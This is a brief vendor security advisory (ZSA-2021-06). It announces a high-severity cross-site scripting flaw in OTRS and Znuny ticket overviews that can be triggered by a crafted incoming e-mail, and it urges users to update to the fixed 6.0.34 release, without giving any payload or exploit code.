ZSA-2021-06

Date: 2021-04-21

Affected: all versions of OTRS Community Edition; Znuny LTS 6.0.33 ; OTRS 7

Severity: high

CVE: Pending

This issue was identified by our team (Jens Pfeifer, Johannes Nickel) during an bug-analysis.
The bug was reported by Nina Knipprath (HHU).

There is a XSS vulnerability in the ticket overviews, which can used to extract all kind of information just
by having a e-mail shown in an overview. An attacker can send a prepared e-mail to the system to trigger the attack.
It does not need any user interaction. We also created a working PoC, to test the impact.

The issue is fixed in the current release 6.0.34 All download links can be found in the release notes.

Please update as soon as possible.

Stay informed